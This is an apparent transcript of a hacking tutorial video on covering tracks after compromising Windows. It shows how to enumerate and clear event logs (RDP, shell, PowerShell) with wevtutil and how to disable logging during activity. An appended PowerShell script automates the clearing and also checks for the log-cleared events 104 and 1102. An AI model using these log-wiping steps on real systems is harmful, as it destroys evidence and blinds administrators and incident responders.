Hello, viewers. Welcome to this latest video on post-exploitation hacking: persistence and continued access. This video is going to be discussing the third and final step of post-exploitation hacking, which is covering tracks: clearing data out, clearing any record of your presence.
This particular video is going to be discussing Windows security logs and how to enumerate them and remove them.
This is discussing sort of the hammer technique, or the sledgehammer technique, of hiding your presence, which is to essentially just set fire to the security logs. Any vigilant system administrator will notice that all of their security logs are gone, and that'll be a warning that someone was there. But, you know, it doesn't tell him you were there. So depending on your situation, how much time you have, and how willing you are to let them know some sort of event took place, it's still a pretty valid option,
not to mention Windows, especially since 7, has made deleting specific log entries extremely difficult. So sometimes deleting everything is the safer course.
So we're gonna go ahead, and you're gonna learn about a tool in this called wevtutil, Windows Event Utility. So we see here it enables you to retrieve information about event logs and publishers, installing, and all of that.
First thing we're gonna do, we're just gonna pretty much run through all of these options. First one is el, enumerate logs. So... wow, look at that. Isn't that a bunch of logs? Lots of Microsoft-Windows stuff. Here's one that might be useful: Microsoft Windows Shell. Maybe something we want to examine. Sticky Notes, lots of junk. Terminal Services. That's definitely one we want to get rid of. Well, not all of them, but certainly we want to consider getting rid of these: RDP. That's a log of things that were, you know, where people RDP'd in.
Let's check this again, so we can get log configuration information. Okay, let's see what that does. It needs a specific log. Well, we've already found one that we're kind of looking at and considering getting rid of. So let's check. All right, so this log is the RDP Operational log. Publisher is Microsoft Windows. It's got some access information. It's got a log file name. Okay,
so if we just want to torch that log, we can try going into this location, see if it will let us in. It would appear so. Well, we'll probably get over this last part.
All right, so you see lots of things. Again, we see Remote Connection Manager event logs. I'm not actually going to delete these particular logs, simply because I wanna have them around for later demos and later information. But if you wanted to destroy logs, this is the place you could go. You could do del *, which pretty much torches everything, or you can do it a little bit more effectively, which is what we're gonna do in a minute. Like I said, I'll show you.
So we've got get-log, we've got set-log. We can actually modify a lot of configuration. We could check publishers, we can install, blah blah. Now, here's a good one. This is what we want: I want to be able to clear a log. Also, exporting logs wouldn't be bad if you wanted to do some serious information gathering; exporting a bunch of logs is a great way to go. But it's sort of time-consuming and boring.
We are going to clear a log. So, wevtutil cl. That's not the one we want at all, is it? So we go back up here to this super interesting stuff. So this is the log we're gonna go ahead and clear. We're gonna do a cl instead of a gl, and bam, it's cleared. So, do we see anything interesting here now? No noticeable changes have been made. However, when someone goes through with their actual log viewer, with Event Viewer, this will now show them absolutely nothing.
What would happen if we did this on, say, another log that we may have noticed a moment ago? First, we'll do a get-log so we can see what's in it. There's no owning publisher. It's an administrative log. It is enabled. All of this information, max size. One thing that's worth doing, if you really wanna mess with an admin, is setting this to disabled while you're doing your stuff and then setting it to enabled when you leave. Um, it won't work perfectly. It will record that it was disabled, but it won't record what you did, which is a big part of, you know, how you can kind of get away with doing things that you probably shouldn't be doing. But in our case, we're just kind of doing the basics instead of anything too high-level and specific, so we're going to go ahead and... So now we have actually gotten rid of that, and we've just emptied it. And now we're feeling pretty safe, you know? They can't actually see us. The logs are gone. They know someone was here, someone did something, but they don't know it was us, and they don't know what we did.
Windows event logs can track anything. You can set up a log to extract pretty much anything you could imagine. So it's useful to really go through that list and actually go through this and just manually check. Well, not manually, necessarily. We go through this and check for anything that might be what you're after, any event log that might have information. Um, again, I mentioned the shell logs. Always worth considering getting rid of them. And the reason for this is really pretty straightforward: you never know what's actually being stored in them. So we see there are actually some other security logs you probably want to clear out. When in doubt with a log, if you've already started clearing logs out, this PowerShell log is worth getting rid of.
That's really all there is for this video. It was pretty quick, pretty straightforward, pretty simple. All you really need to know about logs is, if you don't have a special tool which can actually break in and change them, better no log be present than a log that tells them what you did. With that, we're gonna go ahead and end the video. I hope you learned a lot. I hope you, you know, experienced some new things to do with logs and to do with clearing. And until next time, I'm just me, Joseph Perry, and you've been watching this on cyberia.it.
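Added example, not code from the video or its author: a PowerShell wrapper around the wevtutil steps the video walks through (el to enumerate, gl to read a log's configuration, cl to clear it, and sl /e:false then /e:true for the disable-while-you-work trick), followed by the check a vigilant administrator would run afterwards. It assumes an elevated prompt on a Windows test machine you own; the TerminalServices log name in the usage lines at the bottom is an assumed example, and any name printed by wevtutil el works in its place. The caveat the video only hints at: clearing the Security log writes event ID 1102 into the Security log itself, and clearing any other channel with wevtutil cl writes event ID 104 (provider Microsoft-Windows-Eventlog) into the System log, so the clearing itself leaves a record.

```powershell
# Added example (not from the video). Wraps wevtutil el / gl / gli / cl / sl and then
# looks for the events Windows writes when a log is cleared. Run elevated on a test VM.

function Get-LogRecordCount {
    # Parses "numberOfLogRecords: N" out of `wevtutil gli <log>` (get-loginfo).
    param([Parameter(Mandatory)][string]$LogName)
    $out = & wevtutil gli $LogName 2>&1
    foreach ($l in $out) {
        if ("$l" -match '^numberOfLogRecords:\s*(\d+)') { return [int]$Matches[1] }
    }
    return $null
}

function Show-CandidateLogs {
    # `wevtutil el` lists every channel; filter to the ones the video singles out.
    param([string]$Pattern = 'TerminalServices|PowerShell|Shell-Core|Security')
    & wevtutil el | Where-Object { $_ -match $Pattern }
}

function Clear-LogAndVerify {
    # The sledgehammer: empty one channel with `wevtutil cl`, optionally turning the
    # channel off first with `wevtutil sl /e:false` and back on with `/e:true`.
    param(
        [Parameter(Mandatory)][string]$LogName,
        [switch]$DisableFirst
    )
    & wevtutil gl $LogName            # configuration: enabled flag, max size, log file path
    $before = Get-LogRecordCount $LogName
    "[$LogName] records before: $before"

    if ($DisableFirst) { & wevtutil sl $LogName /e:false }
    & wevtutil cl $LogName
    if ($DisableFirst) { & wevtutil sl $LogName /e:true }

    $after = Get-LogRecordCount $LogName
    "[$LogName] records after:  $after"
}

function Find-LogClearEvents {
    # What the administrator sees: 1102 in Security when the Security log is cleared,
    # 104 from Microsoft-Windows-Eventlog in System when any other channel is cleared.
    param([int]$Hours = 1)
    $since = (Get-Date).AddHours(-$Hours)
    $filters = @(
        @{ LogName = 'Security'; Id = 1102; StartTime = $since },
        @{ LogName = 'System'; ProviderName = 'Microsoft-Windows-Eventlog'; Id = 104; StartTime = $since }
    )
    foreach ($f in $filters) {
        Get-WinEvent -FilterHashtable $f -ErrorAction SilentlyContinue |
            Select-Object TimeCreated, Id, LogName,
                @{ n = 'Message'; e = { ("$($_.Message)" -split "`n")[0] } }
    }
}

# Usage (assumed example channel; pick any name from Show-CandidateLogs):
$log = 'Microsoft-Windows-TerminalServices-RemoteConnectionManager/Operational'
Show-CandidateLogs
Clear-LogAndVerify -LogName $log -DisableFirst
Find-LogClearEvents -Hours 1 | Format-Table -AutoSize
```

The record count drops to 0 after the clear, which is the "absolutely nothing" the video shows in Event Viewer, but the last call will list a fresh event 104 in System naming the channel that was cleared; a Security-log clear shows up as 1102 in Security. Clearing those two logs as well only adds more of the same, which is why the video's own advice is to treat this as the loud option.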